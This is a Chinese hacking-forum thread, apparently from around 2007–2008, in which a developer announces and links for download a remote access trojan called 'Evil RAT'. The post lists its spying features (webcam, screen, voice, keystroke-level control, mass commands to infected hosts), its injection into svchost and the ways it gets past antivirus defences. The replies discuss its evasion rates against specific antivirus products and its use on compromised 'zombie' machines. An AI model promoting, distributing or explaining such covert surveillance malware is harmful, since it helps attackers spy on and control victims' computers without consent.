60 123
发新话题
打印

[原创]Evil RAT

[原创]Evil RAT

软件作者:舍我其谁 MSN:minpojie@live.cn
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
--------------------------------------
File:Client.exe
Size: 3262464 bytes
File Version: 1.0.0.0
Modified: 2008年1月28日, 21:12:45
MD5: 2A48E74A6C269AA6374C00844E34333E
SHA1: 1C2AD3432EFB17CA4DF43390C99A54C51CFBB21A
CRC32: 3018E8DF
--------------------------------------
功能简单介绍:
【1】远程文件管理,可以对远程主机文件进行复制、粘贴、删除,重命名、远程运行等,可以断
点或覆盖模式上传下载文件或文件夹,可以远程压缩文件进行下载后解压,或者本地压缩文件后上
传到远程主机解压,操作简单易用。
【2】远程管理命令,查看远程系统信息、进程管理、窗口管理、服务管理!
【3】捕获屏幕:不但可以连续的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实
现实时操纵功能!
【4】视频查看,可以查看远程摄像头!
【5】模拟dos和telnet(超级终端)。
【6】命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页,筛选符合条件主
机等,点一个按钮就可以让N台远程机器同时执行指定操作!
【7】多种自动上线方式:FTP文件读取、DNS解析域名、固定IP等,用户自由选择!
【8】本地FTP和WEB架设,让你的电脑可以作为FTP或者WEB服务器!
【9】远程主机转借功能,可以让你把远程主机转借到其他指定IP和端口和进行操纵。
【10】流畅的语音监控功能。
【11】上网记录,文件操作记录查看
【12】动态显示简繁体
【13】控制端支持大量主机上线
欢迎各大杀毒公司对软件功能改进提出建议,以更好的保证软件用于合法用途
说明:
DLL:65K,EXE:91K
程序默认插入svchost.exe进程,
可替换式安装模式,
浏览与操作繁体被控端时,正常显示繁体编码,不会出现乱码.
附加:服务端不过杀软主防,测试时请把主防关掉,服务端DLL提供了BITS服务替换安装接口可过默认主防



下载地址:http://60.215.129.84/soft.rar
做最好的自己

TOP

有一点小问题,刚改了
不擅长搞界面,自己看着都觉的难看
有什么问题,兄弟们及时反馈我哦,我好改进咯
做最好的自己

TOP

直接说是改鸽子老掉牙的版本源码 就不用写功能介绍了。。
本人N久前改好的鸽子,谁要就论坛短消息给我 不要回贴发邮箱索要:



BTW:牧民这个名字貌似被某个论坛 全坛通报是个骗子。。不知与楼主有无关系
--->  伱 能 領 導 潮 流.  我 可 領 導 全 賕!  <---

TOP

Delphi 不会的说。zshoucheng 大叔!发我份!貌似楼主的这个,真的停像鸽子。。。还有,Y的没图!
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

TOP

牧民的东西以前是过微点的,我测试过很好用,他官方站也有免费的版本,但不知您这个免费版是怎么作的?

TOP

引用:
引用第7楼zshoucheng于2007-11-14 10:57发表的 :
直接说是改鸽子老掉牙的版本源码 就不用写功能介绍了。。
本人N久前改好的鸽子,谁要发谁一份:

[attach]11828[/attach]

.......
没使用之前不要做没有意义的评论哦,对比用用就知道了,
我只是用了鸽子的样子,服务端自己做的,控制端我只是用的鸽子样子
(我不擅长搞界面,做不好)
鸽子1.2代码问题多的数都数不过来,
还有阁下如果觉的鸽子代码很好改的话,
你给我做个170多K并且过绝大多数主防穿墙的服务端出来
做最好的自己

TOP

什么帖子啊这是?满眼皆是要源代码的。

这些代码早在网上泛滥了吧,这个论坛的源码版块里也是N多,你让人每人给你们发一份不烦啊?自己就不知道动手找找?

楼主做的不错,继续努力,我相信你。zshoucheng这家伙通常很少夸人,不要介意。
Welcome to My Blog :  http://nokyo.blogbus.com/

TOP

zshoucheng: 透露下过主动的核心代码吧!

TOP

楼主动机值得怀疑,牧民确实被多个论坛通报不是一个,非常恶心的一个人,楼主注册帐号就为了发这个帖子吧?

TOP

  只过卡巴默认 虚拟机测试 一台cpu100%卡死  一台成功 但是cpu占用有点大 svchost进程

不太稳定 建议多测试  哈 不要这么快收费了

TOP

应该是卡巴只过默认   其他没测试了 半成品 界面干脆搬鸽子就好了 比较经典

TOP

引用:
引用第9楼aoshi于2007-11-15 11:49发表的 :
  只过卡巴默认 虚拟机测试 一台cpu100%卡死  一台成功 但是cpu占用有点大 svchost进程

不太稳定 建议多测试  哈 不要这么快收费了
屏幕监控占CPU,其它很低,虚拟机我不知什么原因,我就做的只过默认的
稳定性怎么样我清楚,一台电脑只能装一个服务端,并且先进先得后来者安装不上
牧民人品怎么样我与我无关,我只是帮他们做点程序的,他们付钱给我,他们卖他们的,我卖的东西程序上都带我的网名和我的QQ
做最好的自己

TOP

XP SP2,XP SP1 下测试无效,在跟踪程序后发现,释放完DLL后,没有创建服务!没有上线,而且点击更新3322域名出现窗口句柄无效。。然后死机!
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

TOP

2003 SP2 下测试,稳定性不好,经常上不了线,而且远程卸载功能没有作用,不信你们远程卸载下,本地绝对还检测得到服务端!不知道是什么原因,呵呵!
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

TOP

引用:
引用第13楼寂寞宝贝于2007-11-15 13:05发表的 :
2003 SP2 下测试,稳定性不好,经常上不了线,而且远程卸载功能没有作用,不信你们远程卸载下,本地绝对还检测得到服务端!不知道是什么原因,呵呵!
服务端是采用禁用服务的方式,没有删除DLL文件,控制端检测是以DLL文件有没有清除为卸载成不成功来做标示的
做最好的自己

TOP

楼主的ID貌似就是专门为发这个软件注册的,呵呵!

欢迎各大杀毒公司对软件功能改进提出建议,以更好的保证软件用于合法用途
说明:
程序默认替换服务安装,要替换的服务不存在则新建服务svchost.exe启动
一台电脑只能装一个服务端,先来先得,后来者安装不上,稳定性怎么样自己心里清楚就行。
屏幕监控占CPU我在处理中
牧民是干什么的与我无关,我加上他们的名字,是因为牧民远控是我给他们做的,他们卖东西
信誉怎么样与我无关,我卖的IE杀手等东西都有我的网名和QQ,信誉怎么样,我客户心里清楚就行啦。

这些!有广告嫌疑哦!
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

TOP

引用:
引用第14楼舍我其谁于2007-11-15 13:09发表的 :

服务端是采用禁用服务的方式,没有删除DLL文件,控制端检测是以DLL文件有没有清除为卸载成不成功来做标示的
汗!就是说,得自己清理下! 控制端检测是以DLL文件有没有清除为卸载成不成功来做标示的?这句话我有点疑问,8知道你是以安装目录下是否存在dll还是怎么着,我监控了下服务端,貌似只是注册了服务,创建了个DLL,不知道你杂判断!呵呵!能不能说说,偶学学!下次也这样搞?
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

TOP

引用:
引用第16楼寂寞宝贝于2007-11-15 13:16发表的 :



汗!就是说,得自己清理下! 控制端检测是以DLL文件有没有清除为卸载成不成功来做标示的?这句话我有点疑问,8知道你是以安装目录下是否存在dll还是怎么着,我监控了下服务端,貌似只是注册了服务,创建了个DLL,不知道你杂判断!呵呵!能不能说说,偶学学!下次也这样搞?
很简单么,EXE释放DLL时,把DLL所在的路径加密后写入注册表,控制端检测时根据注册表读取加密的DLL路径后做相应操作。
做最好的自己

TOP

还是鸽子的页面 熟悉啊
175k 还不错的 下次测试一下免杀的问题

TOP

测实,非常失败肉鸡上02系统不过关,网吧XP系统本地上线能,外网失败..可以说是比N前的老版本还垃圾.我还非常需要一个无壳版本,免杀我自己搞36个能过32个,我想没问题.....
东邪

TOP

本地测试可 外网也同样失败 不知道原因

TOP

我也测试了下..

这个就是作者发的原码上稍微该动了下..

没有什么实在的意义.

不错我很想要个zshoucheng 的那个版.. 因为自己还没有这个版本的..

我的mail: hackxi@126.com

因为我权限不够所以PM不了你.

TOP

引用:
引用第9楼aoshi于2007-11-15 11:49发表的 :
  只过卡巴默认 虚拟机测试 一台cpu100%卡死  一台成功 但是cpu占用有点大 svchost进程

不太稳定 建议多测试  哈 不要这么快收费了
问题还挺多的啊~~怎么了?~

TOP

XP SP2下运行很不稳定
上线几率很小,而且总是掉
瑞星2008过不了,直接干掉
唉~
黑掉耶稣 我是god

TOP

舍我是不是77169里的?

TOP

 60 123
发新话题